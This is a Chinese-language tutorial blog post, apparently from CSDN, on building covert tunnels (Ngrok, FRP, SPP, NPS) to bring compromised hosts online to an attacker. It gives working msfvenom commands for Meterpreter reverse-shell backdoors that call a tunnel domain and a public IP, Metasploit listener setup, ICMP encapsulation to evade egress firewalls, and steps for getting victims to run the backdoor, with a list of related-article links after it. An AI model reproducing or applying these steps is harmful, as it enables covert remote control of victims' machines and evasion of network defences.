内网安全-隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok&EW项目

旨在代理连接肉鸡后实现本地渗透肉鸡网络架构

Linux:Proxychains

Windows:Sockscap Proxifier

穿透项目:Ngrok Frp Spp Nps EW(停更)

优点:穿透加密数据,中间平台,防追踪,解决网络问题

https://www.ngrok.cc

https://github.com/esrrhs/spp

https://github.com/fatedier/frp

https://github.com/ehang-io/nps

http://www.rootkiter.com/EarthWorm

#内网穿透-Ngrok-入门-上线

https://www.ngrok.cc/

支持的协议:tcp、http、https

支持的类型:正向代理、反向代理

1、服务端配置:

开通隧道-TCP 协议-指向 IP 和端口-开通隧道-连接隧道

2、客户端(攻击者主机)连接服务端:

./sunny clientid 133328291918(隧道id) //控制端连接 Ngrok 的服务器

将下图的内容上传到攻击者主机,

3、客户端生成后门配置监听:

注意生成的是tcp协议后门,生成木马是使用的是ngrok平台提供的域名

msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10134 -f exe -o ngrok.exe

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost 0.0.0.0

set lport 2222

run

攻击者主机使用隧道号与平台建立连接,受害者主机点击后门之后,反向连接ngrok平台提供的域名,流量经过转发到攻击者主机上,实现内网穿透。

攻击者主机打开msf开启监听,监听端口是刚生成隧道的本地端口2222,然后服务器点击木马即可上线

#内网穿透-Frp-简易型-上线

https://github.com/fatedier/frp

frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS

等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公

网。

自行搭建,方便修改,成本低,使用多样化,适合高富帅及隐私哥哥们

1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)

服务器修改配置文件 frps.ini:

[common]

bind_port = 7000

启动服务端:

./frps -c ./frps.ini

看我这篇文章详细介绍使用

frp搭建隧道-CSDN博客

内网穿透-Spp-特殊协议-上线

https://github.com/esrrhs/spp

支持的协议:tcp、udp、udp、icmp、http、kcp、quic

支持的类型:正向代理、反向代理、socks5正向代理、socks5反向代理

在对抗项目中有遇到过一些极端环境,比如目标封了tcp,http等常用出网的协议,

但是icmp,dns等协议可能因为业务需要或者管理者安全意识不到位导致没有封干净。

在这种场景下就可以使用这些容易被忽视的协议进行隧道的搭建。

防火墙对tcp的出站封杀,然后我们这里利用spp这个项目把tcp封装成icmp出网,icmp协议到攻击机成功上线

1、服务端: 监听本地icmp流量

./spp -type server -proto ricmp -listen 0.0.0.0

2、客户端: 将本地8082端口流量转发至47.94.236.117 8081端口上(TCP封装成ICMP)

spp -name "test" -type proxy_client -server 47.94.236.117 -fromaddr :8082 -toaddr :8081 -proxyproto tcp -proto ricmp

3、CS

监听器1:http 47.94.236.117 8081

监听器2:http 127.0.0.1 8082

生成后门:监听器2

将后门上传至受害者主机执行

内网穿透-nps-特殊协议-上线

内网渗透---隧道搭建&SPP与NPS内网穿透_spp代理上线cs-CSDN博客

注意服务端与客户端版本一致

nps默认配置文件使用了80,443,8080,8024端口

80与443端口为域名解析模式默认端口

8080为web管理访问端口

8024为网桥端口,用于客户端与服务器通信 默认账号密码:admin/123

1、启动

./nps install

./nps

访问vps的8080端口,默认账号密码:admin/123

2、创建客户端,生成密匙

3、添加协议隧道,绑定指向

-客户端:

1、连接服务端:

bash 复制代码
./npc -server=47.94.236.117:8024 -vkey=uajwhbu9155qh89v  #创建客户端后自动生成密钥

2、生成后门:

bash 复制代码
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=5566 -f exe -o nps.exe

3、监听后门:

攻击者监听自己电脑本地的6666端口

bash 复制代码
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 6666
run
相关推荐
安 当 加 密6 分钟前
中小企业Radius认证服务器的低成本高安全解决方案
运维·服务器·安全
Codingwiz_Joy1 小时前
Day04 模拟原生开发app过程 Androidstudio+逍遥模拟器
android·安全·web安全·安全性测试
snpgroupcn2 小时前
ECC升级到S/4 HANA的功能差异 物料、采购、库存管理对比指南
运维·安全·数据库架构
旭华智能3 小时前
地下井室可燃气体监测装置:守护地下安全,防患于未“燃”!
安全
暴躁的小胡!!!3 小时前
Linux权限维持之vim python 扩展后门(五)
linux·运维·服务器·网络·安全
TinTin Land4 小时前
后 Safe 时代:多签钱包安全新范式与防范前端攻击的新思路
前端·安全
开开心心就好5 小时前
电脑睡眠智能管控:定时、依状态灵活调整,多模式随心选
javascript·windows·python·安全·django·pdf·电脑
福鸦5 小时前
C++ STL深度解析:现代编程的瑞士军刀
开发语言·c++·算法·安全·架构
网络安全Ash5 小时前
2025网络安全漏洞
安全·web安全
独行soc5 小时前
2025年渗透测试面试题总结-长某亭科技-安全服务工程师(二面) (题目+回答)
网络·科技·安全·面试·红蓝攻防·护网·2015年